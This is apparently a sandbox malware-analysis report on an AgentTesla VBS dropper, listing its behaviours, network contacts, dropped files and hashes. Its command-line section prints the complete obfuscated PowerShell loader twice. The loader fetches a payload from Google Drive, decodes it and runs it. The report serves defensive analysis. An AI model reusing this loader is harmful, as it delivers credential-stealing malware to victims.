Analysis Overview
SHA256
03cbdd488fd6819ccfafa38dedf10ab4db2e9d447e69ee89f539255941ad511d
Threat Level: Known bad
The file 03cbdd488fd6819ccfafa38dedf10ab4db2e9d447e69ee89f539255941ad511d.vbs was found to be: Known bad.
Malicious Activity Summary
AgentTesla
Blocklisted process makes network request
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
Suspicious use of SetThreadContext
Suspicious use of NtCreateThreadExHideFromDebugger
Suspicious use of NtSetInformationThreadHideFromDebugger
Command and Scripting Interpreter: PowerShell
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-19 14:49
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-19 14:49
Reported
2024-06-19 14:51
Platform
win7-20240220-en
Max time kernel
141s
Max time network
149s
Command Line
Signatures
AgentTesla
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
Suspicious use of NtCreateThreadExHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2000 set thread context of 2608 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\03cbdd488fd6819ccfafa38dedf10ab4db2e9d447e69ee89f539255941ad511d.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -windowstyle 1 "cls;$Enchisel = 1;$Skvt='ring';$Procreativity218='S';Function Tvivlesyg($tablehopped){$Strangulates=$tablehopped.Length-$Enchisel;$Stiksaars=$Procreativity218+'ubst'+$Skvt;For( $vaporisers=7;$vaporisers -lt $Strangulates;$vaporisers+=8){$Donnie+=$tablehopped.$Stiksaars.Invoke( $vaporisers, $Enchisel);}$Donnie;}function Oversway($Ynglestedernes){ . ($Hjemsgelse) ($Ynglestedernes);}$Tiplet=Tvivlesyg ' Sed.elMStershaoDidymisz Hurry.i AkvarilSy heeklinextr a unolog/Prisonf5Ioniser.Sultana0Plateau Topa,ol( PrinteWleukophiYdmygstnGldelsedkomediaoEndel,gw Mercedsblokker ,tabstaN Strst T Pr pre Grometr1 Perine0Brtsejl.Ukrnkel0Aa nend;cinquef A,venarWUndis,oi Impa.snra,gedn6i citat4Fundame;Unidyll E.ilicsx Antise6Sekunde4Furcife; Im,alm DramatirUnirascv L,erst:Program1Scattie2P.imrko1Rabbitl. Tampon0Serjean)Lgetsob Pesh.toGkontr leCantatoc bucibak.ncrankoEndoper/ Ophtha2Unossif0Plastom1Nulpunk0Ne vebu0Fulth,r1 Handma0Reformp1Beachhe GuldaldFKudizeoiUdgrfter rlenate,uccinifAciculuoaglipayxLnindeh/Resgues1avancem2Optaell1Startel.Forspil0Latente ';$Leucadendron=Tvivlesyg ' Au,optUAppeases .kkemoe,lankearT,aditi-NarcissAGiordang eje,doeSal.antn Kdva,etRefl ks ';$Enhardy=Tvivlesyg ' LaborahTri,ngut HjlpeptDriftsipGaleasesSvingta:Con lob/Subtaxo/vebgernd LairmerfremmeliKv.ddervInksta e ma,rop. Pr gragSmalskuo AdjudaoKlipning.loreatlBeseecheHaspnin.Autogencambulato Rentenm Unhurr/Daoinesu Samme.cEn iche?Paaskese Ko,sulxliflighpanhuggeo IdemanrChieft tRestbal=stoffrid Po.byco Rep,riwpa sionn Jeopa,lGalapagoBum.assaMessi.gdAldocoo&Gnidni.iKo.dnindOverdoz=F,ntina1Chassep_SceneriNExaratiXRisikobtComptinWCrappi L,ntipudoHvedemewIndoktrEDermatrLJoker eOT.rnebr3Adiat eAMentaluw Adminil,emalsnTRemolliGIm.atieXSuppl m2.raktatJ SeminaRbob,nerPOtoplasLIn.rejsdAdderesc JennetR Lyk,es1Reentraa.rstninXasnerscE HemidaRInvpegaJPaatage ';$Eigenvalues=Tvivlesyg ' gump.i>Fo.blff ';$Hjemsgelse=Tvivlesyg 'Arbejd.iAdjoin.eproduk x Skn.it ';$Stadselige='Bkkenbenets';$Woodspite = Tvivlesyg 'FlseneseBordskacKalciumhYclepedoKrystal Clurica%CosuretaCaveaeppmeningspBirdbatd DratteaKjllertt GelatiaTele.on%.odulud\OverhalSS,burbacNonscierFlaskeaoLokalavu,eathergUndersteKartone.Skraa eSBesin ewFjer,gtiSibbss. urbopr&Narcoti&Overmen Mongrele Aalbe.cQerssheh Skolelo Postlu sarco,otIndices ';Oversway (Tvivlesyg 'Trevang$Kighullg.ykologlKneepieoCon.umabTreeshiau,womanlOverbas: fagemeAOutpassfs.mbionfFa.tiglyFricatirInters,iFodboldnBebopp,gPeroliasLectorsr W.xinga Pr,ssimLangtrupPullulaeTeltligrAfpri,ns Kumysb=Sacchar( Eniguac aarg nmMangonedLaurasp Re.ogni/Teemingc D.ainl Smreri$Sho esfWPhrenoloUdkasteo Hypodidkropsvis fe.ledpSurfboaiUdgivelt Unboxee,allele)Avarit. ');Oversway (Tvivlesyg 'For,tag$girondeg F eratlTyvst,loHydrosebP.steuraR,ddersl Napole:SnderjyS .ommany Fordums KommistMonarkieUrigtigmAnte ebuTil,ager D utereKanoniss Tele n= Greesa$UnreplaE,tundern StillfhSurretoaGrac,lurSentimedSubgrapyParoemi. SkaktesU,municpSl,venel DispeoiSlakytetFos erh(Tmmermn$ CamphiENondea,iTrvejorg Denns,equidd enFelixspvBrudeudaFemtenalElleve.u trypsieGenkaldsPhiloso)Baarebu ');Oversway (Tvivlesyg 'special[OmodyniNCymricjeVilligstSvejsef.KvittepS UndeteeSta,darrUfordjevSup osaiRep imecTouchileVegetarP Hen,edoDechifriInterrunof entltInkenbuMNit,ogeaSorrywanLi,jesta Hipp,pgOrganise.xtradurrevolub]Plenumd: Subdue:ChannelSEanmisdeO.ersigcVgkon,auB,ttermrChoryzai,anhapitYngle.tycephaloPfoelgevrconcilio NonpertTrickiloOver,nccUnpenneo DrikkelSsonfor Ka ital= Iagtta Knebler[OparbejNnicolinebesmreltMellem,.overwovSTandemmeNominalcUnderglurodekasrTherma iBugcerttCr ftmayTemplesPButchesrRekogn.oBa,dendtEuascomoSystolicNichisroT.pehuslApodedeTFlugte.yAb,nnemp FiskeaeRemplac]Superex:Asexual:Mill,reT Emydinl,ryptodsCo,nect1Birkies2Pectina ');$Enhardy=$Systemures[0];$Hypokinetic= (Tvivlesyg 'Disk ej$Stt.epigHentydelFrak aloCochoncbErklrinaGlanspelAmylops:CecilsuMSubstanaCytostolDod eraiImper agMalars,nMelasseeGondr crAfs reds Konfig=TromsteN pottyseSor,seswKullagr- kmacroO FecalcbfaunernjFoder,ee,lonrevc M,ologt Oppo,i SunnsuStegneomy irenssA bejdstcoxorane AdminimDimers,. DiskofNRumak seLi.leskt veget .AprildaWAffronteMult.cibPass.viCVipstjelbegrebsiembou heZygomycn Bitbltt');$Hypokinetic+=$Affyringsrampers[1];Oversway ($Hypokinetic);Oversway (Tvivlesyg 'Cuisi,i$ SpindeMOnondaga DisketlRepavedi SyltetgObjectinW.lburte MemorarGastronsUndervi. FlocciH Kekchie A,toniaKppetordudho.deediatomar Strik,s Fa,tsa[Outyiel$TransskLIncur aeTropekluSmaaligcForhuseaSymp omd.rosaekeHustruenGoldenwdDistrahrProstatoyaroviznv ffelj]Syneriz=Overdra$SolicitTAnoeticij panvgpCapriccl MangeseForretntGrillst ');$Nonadjudicated=Tvivlesyg 'Agrom z$Ent popMFornaglaCycliselDescriai ConvengFastsaenpuckableUdbytterpreentes pfenni.magthavDEnaarinoIcterinwNotabiln He erolProduktoconspicaPana.ead,ubjectF eprousi avigel blgetrem,terin( Slutor$ AntiksE Photodn Stolpehtr.ssmaadiarkterMaharandUddeligyFrandse,.orklar$Blles.mO La.roioRainproc CitolayIrresonsMultivetKib ages G.stro)Ineff.r ';$Oocysts=$Affyringsrampers[0];Oversway (Tvivlesyg ' hirten$ FestligAdia.helAfbrksboVaterlibParaciuaOwllikel Boobie:Krim,krB Accouna bedsp,bImpingebTingfstlTonsilleDampdredReautho=Indeksa( NationTWaistcoeCubo des OvillutTirsdag- holismPOpmrksoaBrasnentStboldehMuskula Trusser$ForedesOContagioPerora.cFejteneyImdegaas Knifeptal.rmersu.fritn)udmugni ');while (!$Babbled) {Oversway (Tvivlesyg ' Fritlb$rv nessgUd,ortelDiskeseoSaxofonbHormoniaPreaddil Grns.f:tilregnM SlibesiBestiklcEldrev,rReassa.oGryntencDukkerthTi bageiKlatch,rCannonboSvitserpFjorte,tTrefoileRoo,aanrDatam.taSolvemenM dgaae=Piskefl$Uhin,retIllegalr Dekantu efraine Unname ') ;Oversway $Nonadjudicated;Oversway (Tvivlesyg 'D.celerSAlienatt irdleaBismethr Arb.ritSa.sons-SkemabuSK,astralAtticise elatineManifesp hunden patined4Vagnarb ');Oversway (Tvivlesyg 'Oligosy$FeifrefgSalgsvalAwe,lyioNonecumbOpgiveta BuckeylHydroae:Stear nBMerudgia Penetrb Fiskesbbureaucl Forttse Idiomedtrykfje=myxop.y(MalaromTHofjg.reUnprodesv,lkomst Deling-DyrepenPPoliovaapseudobtLitote h ensket Caddien$ An.ilsONonlarcoFlageolcGeophagy unparosSyvkantt Deft.ysMo oriz)Easies ') ;Oversway (Tvivlesyg 'Bio oci$StdpudegPimperilInsubduoStegebob.iruettaMilieutlHyp chr:Rig.andHDi ownayForpaknb HuslejaAnlg.panHiredsqt Fri.kehNerveliu GodvilsSawsmit=Central$S.rumalgTe sturlLimousio.adedlyb Selv,vaCoccololDyrenav: Huks,eGLavad laHewettil Def.ktl Regnspe.ryntprrManualeeGenstarnNimblewsSprregr2 Anti,i0Repe,ce4Isogona+Jul,aft+Cirklel%Torisnu$Soap laS Vicenty PulpstsTrimerit GennemeHuffilymB otheruPotentirCervicoeCyrillis Pr.imb.NoncalccSpaltepoVenten,uKrops.inRadi,let.midazo ') ;$Enhardy=$Systemures[$Hybanthus];}$Krigsfangers=349622;$Countermands=30457;Oversway (Tvivlesyg 'Monof a$Deu,schgUpharsil M.sedioFirlotbbTrngslea mpshemlStilett:skienssDSmallhoeKontr.lr Tudl,keUnbellilRantmuciKa ayafc Faste,tIndentusFormumn Lugsome= Indfoe EtageadGJededi eTrassertFe,iesy- LgformC ChequeoLytforvn Tr erstRecent.eUsaglignChessart bivoks Lyctida$ MetodiOBlousesoRivindfcprotegeyDisagresdromaeotEvidenssF.nansl ');Oversway (Tvivlesyg 'Pens,on$SkglavegLumenallSparekao R,glanb mellemaFrekvenlOverres:Brandmes Hy.ogenLuxembuaDybstrupCevichesAllove eAlexandtU,frsleiho agognSlvstolg SkjteseUnsamplt SmeltnsUmaleta T.xamet=Vaabenh Resorpt[ RibbonS,lkekarySkuddensB,ttinatsukkeute Supposm Combur. owbaneCOutdwelo Paillen PishogvUnbittie Au,oblrextrasctUnraile] Okse.u:Lyk,eop:DypningF LigedarRet.rdioFyge,anmExaminiBNereideata aceasAcajoubeGaldest6Dilata 4SildebeSSkjtendtillusiorTil.oldi Recursn PantstgMocking(Cabotin$NstmindD BlumineSpeditirWaddi.reStud relSelvforisprangscUdvirknt Semicosour,bie)Copepod ');Oversway (Tvivlesyg 'Dugperl$s,omatogFinhvallBivuakeoBli sedb Yobbo.aU listnlStrmmen: OpkrvnE PoleaxtU,elikah Platyro Chl rixAerodyniCook aseCunjergs Amaret1Citr.ll1Epoxyla9Skomage Depermi=konjunk Fyrr.tr[temp raSMejslinyTridimes ookhot ScenogedisgrosmHje meh. AerobaTfarvemee ReratexSystemptSjleso.. eltmarETartufinKursliscPalatoroBrushpodtredjegiGlyptotnGartnerg Presol] Gr ofx: Trying: TilthsALiddenfSTrellisCKkkenboIDaakalvIWhitesi. AnchisGSoftbale un,ramtCompartS KongretKrage.orSlaggedi OverponRullersgF shmou(outland$Tildigts PrevienForsknia Ra.finpkulbuelsDalstrgeHyperdit AerostiSubdepanHopefulg,ladderehemicyctEro.ogesBize.ma)P.rsone ');Oversway (Tvivlesyg 'Hypercy$Varpet.g,wiftenlLegatesoR ggersb,urisdiaNaturlolrocke s:StyringS PostichAftopnioMangilyvTrowabliMoskusknSubethfgNatbord=Theater$StichosEEkspo,etFysiurghbukse,noAloysiaxLemperui T gneseV.ndudssLushnes1 Brneli1Karenst9Purlgse.RetropesMilvusiuDubietibAntikvasFlappert BodhisrBrugskuiSalgsstn Coventg Dressm(Jernfor$ FintmaKP,leogerStrkni.i KrlgtegNonpenasRevendffTak,eska Cathetn F.ldepgLindedeeBesparerVerdenssVin,ues,Konkre,$ BespirCPosteroo SpegepuRaaglasnKarbonatSluddere Platear.nefuldm.anacetaForsty.nSoarer dSkriftesUnrem,t) A,hron ');Oversway $Shoving;"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Scrouge.Swi && echo t"
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;$Enchisel = 1;$Skvt='ring';$Procreativity218='S';Function Tvivlesyg($tablehopped){$Strangulates=$tablehopped.Length-$Enchisel;$Stiksaars=$Procreativity218+'ubst'+$Skvt;For( $vaporisers=7;$vaporisers -lt $Strangulates;$vaporisers+=8){$Donnie+=$tablehopped.$Stiksaars.Invoke( $vaporisers, $Enchisel);}$Donnie;}function Oversway($Ynglestedernes){ . ($Hjemsgelse) ($Ynglestedernes);}$Tiplet=Tvivlesyg ' Sed.elMStershaoDidymisz Hurry.i AkvarilSy heeklinextr a unolog/Prisonf5Ioniser.Sultana0Plateau Topa,ol( PrinteWleukophiYdmygstnGldelsedkomediaoEndel,gw Mercedsblokker ,tabstaN Strst T Pr pre Grometr1 Perine0Brtsejl.Ukrnkel0Aa nend;cinquef A,venarWUndis,oi Impa.snra,gedn6i citat4Fundame;Unidyll E.ilicsx Antise6Sekunde4Furcife; Im,alm DramatirUnirascv L,erst:Program1Scattie2P.imrko1Rabbitl. Tampon0Serjean)Lgetsob Pesh.toGkontr leCantatoc bucibak.ncrankoEndoper/ Ophtha2Unossif0Plastom1Nulpunk0Ne vebu0Fulth,r1 Handma0Reformp1Beachhe GuldaldFKudizeoiUdgrfter rlenate,uccinifAciculuoaglipayxLnindeh/Resgues1avancem2Optaell1Startel.Forspil0Latente ';$Leucadendron=Tvivlesyg ' Au,optUAppeases .kkemoe,lankearT,aditi-NarcissAGiordang eje,doeSal.antn Kdva,etRefl ks ';$Enhardy=Tvivlesyg ' LaborahTri,ngut HjlpeptDriftsipGaleasesSvingta:Con lob/Subtaxo/vebgernd LairmerfremmeliKv.ddervInksta e ma,rop. Pr gragSmalskuo AdjudaoKlipning.loreatlBeseecheHaspnin.Autogencambulato Rentenm Unhurr/Daoinesu Samme.cEn iche?Paaskese Ko,sulxliflighpanhuggeo IdemanrChieft tRestbal=stoffrid Po.byco Rep,riwpa sionn Jeopa,lGalapagoBum.assaMessi.gdAldocoo&Gnidni.iKo.dnindOverdoz=F,ntina1Chassep_SceneriNExaratiXRisikobtComptinWCrappi L,ntipudoHvedemewIndoktrEDermatrLJoker eOT.rnebr3Adiat eAMentaluw Adminil,emalsnTRemolliGIm.atieXSuppl m2.raktatJ SeminaRbob,nerPOtoplasLIn.rejsdAdderesc JennetR Lyk,es1Reentraa.rstninXasnerscE HemidaRInvpegaJPaatage ';$Eigenvalues=Tvivlesyg ' gump.i>Fo.blff ';$Hjemsgelse=Tvivlesyg 'Arbejd.iAdjoin.eproduk x Skn.it ';$Stadselige='Bkkenbenets';$Woodspite = Tvivlesyg 'FlseneseBordskacKalciumhYclepedoKrystal Clurica%CosuretaCaveaeppmeningspBirdbatd DratteaKjllertt GelatiaTele.on%.odulud\OverhalSS,burbacNonscierFlaskeaoLokalavu,eathergUndersteKartone.Skraa eSBesin ewFjer,gtiSibbss. urbopr&Narcoti&Overmen Mongrele Aalbe.cQerssheh Skolelo Postlu sarco,otIndices ';Oversway (Tvivlesyg 'Trevang$Kighullg.ykologlKneepieoCon.umabTreeshiau,womanlOverbas: fagemeAOutpassfs.mbionfFa.tiglyFricatirInters,iFodboldnBebopp,gPeroliasLectorsr W.xinga Pr,ssimLangtrupPullulaeTeltligrAfpri,ns Kumysb=Sacchar( Eniguac aarg nmMangonedLaurasp Re.ogni/Teemingc D.ainl Smreri$Sho esfWPhrenoloUdkasteo Hypodidkropsvis fe.ledpSurfboaiUdgivelt Unboxee,allele)Avarit. ');Oversway (Tvivlesyg 'For,tag$girondeg F eratlTyvst,loHydrosebP.steuraR,ddersl Napole:SnderjyS .ommany Fordums KommistMonarkieUrigtigmAnte ebuTil,ager D utereKanoniss Tele n= Greesa$UnreplaE,tundern StillfhSurretoaGrac,lurSentimedSubgrapyParoemi. SkaktesU,municpSl,venel DispeoiSlakytetFos erh(Tmmermn$ CamphiENondea,iTrvejorg Denns,equidd enFelixspvBrudeudaFemtenalElleve.u trypsieGenkaldsPhiloso)Baarebu ');Oversway (Tvivlesyg 'special[OmodyniNCymricjeVilligstSvejsef.KvittepS UndeteeSta,darrUfordjevSup osaiRep imecTouchileVegetarP Hen,edoDechifriInterrunof entltInkenbuMNit,ogeaSorrywanLi,jesta Hipp,pgOrganise.xtradurrevolub]Plenumd: Subdue:ChannelSEanmisdeO.ersigcVgkon,auB,ttermrChoryzai,anhapitYngle.tycephaloPfoelgevrconcilio NonpertTrickiloOver,nccUnpenneo DrikkelSsonfor Ka ital= Iagtta Knebler[OparbejNnicolinebesmreltMellem,.overwovSTandemmeNominalcUnderglurodekasrTherma iBugcerttCr ftmayTemplesPButchesrRekogn.oBa,dendtEuascomoSystolicNichisroT.pehuslApodedeTFlugte.yAb,nnemp FiskeaeRemplac]Superex:Asexual:Mill,reT Emydinl,ryptodsCo,nect1Birkies2Pectina ');$Enhardy=$Systemures[0];$Hypokinetic= (Tvivlesyg 'Disk ej$Stt.epigHentydelFrak aloCochoncbErklrinaGlanspelAmylops:CecilsuMSubstanaCytostolDod eraiImper agMalars,nMelasseeGondr crAfs reds Konfig=TromsteN pottyseSor,seswKullagr- kmacroO FecalcbfaunernjFoder,ee,lonrevc M,ologt Oppo,i SunnsuStegneomy irenssA bejdstcoxorane AdminimDimers,. DiskofNRumak seLi.leskt veget .AprildaWAffronteMult.cibPass.viCVipstjelbegrebsiembou heZygomycn Bitbltt');$Hypokinetic+=$Affyringsrampers[1];Oversway ($Hypokinetic);Oversway (Tvivlesyg 'Cuisi,i$ SpindeMOnondaga DisketlRepavedi SyltetgObjectinW.lburte MemorarGastronsUndervi. FlocciH Kekchie A,toniaKppetordudho.deediatomar Strik,s Fa,tsa[Outyiel$TransskLIncur aeTropekluSmaaligcForhuseaSymp omd.rosaekeHustruenGoldenwdDistrahrProstatoyaroviznv ffelj]Syneriz=Overdra$SolicitTAnoeticij panvgpCapriccl MangeseForretntGrillst ');$Nonadjudicated=Tvivlesyg 'Agrom z$Ent popMFornaglaCycliselDescriai ConvengFastsaenpuckableUdbytterpreentes pfenni.magthavDEnaarinoIcterinwNotabiln He erolProduktoconspicaPana.ead,ubjectF eprousi avigel blgetrem,terin( Slutor$ AntiksE Photodn Stolpehtr.ssmaadiarkterMaharandUddeligyFrandse,.orklar$Blles.mO La.roioRainproc CitolayIrresonsMultivetKib ages G.stro)Ineff.r ';$Oocysts=$Affyringsrampers[0];Oversway (Tvivlesyg ' hirten$ FestligAdia.helAfbrksboVaterlibParaciuaOwllikel Boobie:Krim,krB Accouna bedsp,bImpingebTingfstlTonsilleDampdredReautho=Indeksa( NationTWaistcoeCubo des OvillutTirsdag- holismPOpmrksoaBrasnentStboldehMuskula Trusser$ForedesOContagioPerora.cFejteneyImdegaas Knifeptal.rmersu.fritn)udmugni ');while (!$Babbled) {Oversway (Tvivlesyg ' Fritlb$rv nessgUd,ortelDiskeseoSaxofonbHormoniaPreaddil Grns.f:tilregnM SlibesiBestiklcEldrev,rReassa.oGryntencDukkerthTi bageiKlatch,rCannonboSvitserpFjorte,tTrefoileRoo,aanrDatam.taSolvemenM dgaae=Piskefl$Uhin,retIllegalr Dekantu efraine Unname ') ;Oversway $Nonadjudicated;Oversway (Tvivlesyg 'D.celerSAlienatt irdleaBismethr Arb.ritSa.sons-SkemabuSK,astralAtticise elatineManifesp hunden patined4Vagnarb ');Oversway (Tvivlesyg 'Oligosy$FeifrefgSalgsvalAwe,lyioNonecumbOpgiveta BuckeylHydroae:Stear nBMerudgia Penetrb Fiskesbbureaucl Forttse Idiomedtrykfje=myxop.y(MalaromTHofjg.reUnprodesv,lkomst Deling-DyrepenPPoliovaapseudobtLitote h ensket Caddien$ An.ilsONonlarcoFlageolcGeophagy unparosSyvkantt Deft.ysMo oriz)Easies ') ;Oversway (Tvivlesyg 'Bio oci$StdpudegPimperilInsubduoStegebob.iruettaMilieutlHyp chr:Rig.andHDi ownayForpaknb HuslejaAnlg.panHiredsqt Fri.kehNerveliu GodvilsSawsmit=Central$S.rumalgTe sturlLimousio.adedlyb Selv,vaCoccololDyrenav: Huks,eGLavad laHewettil Def.ktl Regnspe.ryntprrManualeeGenstarnNimblewsSprregr2 Anti,i0Repe,ce4Isogona+Jul,aft+Cirklel%Torisnu$Soap laS Vicenty PulpstsTrimerit GennemeHuffilymB otheruPotentirCervicoeCyrillis Pr.imb.NoncalccSpaltepoVenten,uKrops.inRadi,let.midazo ') ;$Enhardy=$Systemures[$Hybanthus];}$Krigsfangers=349622;$Countermands=30457;Oversway (Tvivlesyg 'Monof a$Deu,schgUpharsil M.sedioFirlotbbTrngslea mpshemlStilett:skienssDSmallhoeKontr.lr Tudl,keUnbellilRantmuciKa ayafc Faste,tIndentusFormumn Lugsome= Indfoe EtageadGJededi eTrassertFe,iesy- LgformC ChequeoLytforvn Tr erstRecent.eUsaglignChessart bivoks Lyctida$ MetodiOBlousesoRivindfcprotegeyDisagresdromaeotEvidenssF.nansl ');Oversway (Tvivlesyg 'Pens,on$SkglavegLumenallSparekao R,glanb mellemaFrekvenlOverres:Brandmes Hy.ogenLuxembuaDybstrupCevichesAllove eAlexandtU,frsleiho agognSlvstolg SkjteseUnsamplt SmeltnsUmaleta T.xamet=Vaabenh Resorpt[ RibbonS,lkekarySkuddensB,ttinatsukkeute Supposm Combur. owbaneCOutdwelo Paillen PishogvUnbittie Au,oblrextrasctUnraile] Okse.u:Lyk,eop:DypningF LigedarRet.rdioFyge,anmExaminiBNereideata aceasAcajoubeGaldest6Dilata 4SildebeSSkjtendtillusiorTil.oldi Recursn PantstgMocking(Cabotin$NstmindD BlumineSpeditirWaddi.reStud relSelvforisprangscUdvirknt Semicosour,bie)Copepod ');Oversway (Tvivlesyg 'Dugperl$s,omatogFinhvallBivuakeoBli sedb Yobbo.aU listnlStrmmen: OpkrvnE PoleaxtU,elikah Platyro Chl rixAerodyniCook aseCunjergs Amaret1Citr.ll1Epoxyla9Skomage Depermi=konjunk Fyrr.tr[temp raSMejslinyTridimes ookhot ScenogedisgrosmHje meh. AerobaTfarvemee ReratexSystemptSjleso.. eltmarETartufinKursliscPalatoroBrushpodtredjegiGlyptotnGartnerg Presol] Gr ofx: Trying: TilthsALiddenfSTrellisCKkkenboIDaakalvIWhitesi. AnchisGSoftbale un,ramtCompartS KongretKrage.orSlaggedi OverponRullersgF shmou(outland$Tildigts PrevienForsknia Ra.finpkulbuelsDalstrgeHyperdit AerostiSubdepanHopefulg,ladderehemicyctEro.ogesBize.ma)P.rsone ');Oversway (Tvivlesyg 'Hypercy$Varpet.g,wiftenlLegatesoR ggersb,urisdiaNaturlolrocke s:StyringS PostichAftopnioMangilyvTrowabliMoskusknSubethfgNatbord=Theater$StichosEEkspo,etFysiurghbukse,noAloysiaxLemperui T gneseV.ndudssLushnes1 Brneli1Karenst9Purlgse.RetropesMilvusiuDubietibAntikvasFlappert BodhisrBrugskuiSalgsstn Coventg Dressm(Jernfor$ FintmaKP,leogerStrkni.i KrlgtegNonpenasRevendffTak,eska Cathetn F.ldepgLindedeeBesparerVerdenssVin,ues,Konkre,$ BespirCPosteroo SpegepuRaaglasnKarbonatSluddere Platear.nefuldm.anacetaForsty.nSoarer dSkriftesUnrem,t) A,hron ');Oversway $Shoving;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Scrouge.Swi && echo t"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | drive.google.com | udp |
| GB | 142.250.187.238:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| GB | 142.250.179.225:443 | drive.usercontent.google.com | tcp |
| GB | 142.250.187.238:443 | drive.google.com | tcp |
| GB | 142.250.179.225:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 104.26.12.205:443 | api.ipify.org | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\Multinucleolar.txt
| MD5 | bdbffd38aaa980265fd1c77b0aaf4e5f |
| SHA1 | 841cbd0639dae47588ee6b8df96913c7591b2972 |
| SHA256 | 7f33b721d070f46062950b6f911bf686d88cfed96f282f1e85d1b5ce582a0cc0 |
| SHA512 | d96d23b41504729b27a19695610bc7f1d2407a63d143e56bc32bd181b82c3f10ddf4194ee8b85154b1eff9d756997d08e29bc22ab5bc61ef4afc918cdb2ef4da |
memory/1224-326-0x000007FEF599E000-0x000007FEF599F000-memory.dmp
memory/1224-327-0x000000001B650000-0x000000001B932000-memory.dmp
memory/1224-329-0x000007FEF56E0000-0x000007FEF607D000-memory.dmp
memory/1224-328-0x00000000029F0000-0x00000000029F8000-memory.dmp
memory/1224-331-0x000007FEF56E0000-0x000007FEF607D000-memory.dmp
memory/1224-330-0x000007FEF56E0000-0x000007FEF607D000-memory.dmp
memory/1224-332-0x000007FEF56E0000-0x000007FEF607D000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\XJIHEOZVIJUM3A5FV6UP.temp
| MD5 | 4a3f90c4fc2e2cd2fad2a2ef38450277 |
| SHA1 | cf710b9b4453da4587753344430ba4d68232e85d |
| SHA256 | fbeef3fc8305f2903da9ab884bd2017b586281e06210253cacc88dc747d0a449 |
| SHA512 | c8f359f5a5c4925c5852dde20c4442f93cf849691c35f8e5fc15340ae7ef2e0efd696c345c6becb2b65dfd5129b7c375f1d3dffd5d7e3303e6ac22ac84df1689 |
C:\Users\Admin\AppData\Roaming\Scrouge.Swi
| MD5 | be60fe46432e08e827aeefd9f72d5790 |
| SHA1 | 7322ebc77810e84976136174258dddde78a23f27 |
| SHA256 | 8722cb6fe1e75ddcd9127b92f438e2b0155eab29cc29270ca7aa35be9edff7b4 |
| SHA512 | 72a7e93c1c1d78260ec1ac1438450baf4d6f21a1299824878e405a115c8318796d7bf233db80d42f8d66ab1c73531741965fbf1e9679a1fb2071bab9d8b9e913 |
memory/1224-339-0x000007FEF56E0000-0x000007FEF607D000-memory.dmp
memory/2000-338-0x00000000064F0000-0x000000000C149000-memory.dmp
memory/1224-340-0x000007FEF599E000-0x000007FEF599F000-memory.dmp
memory/2608-343-0x00000000009A0000-0x0000000001A02000-memory.dmp
memory/2608-365-0x00000000009A0000-0x0000000001A02000-memory.dmp
memory/1224-366-0x000007FEF56E0000-0x000007FEF607D000-memory.dmp
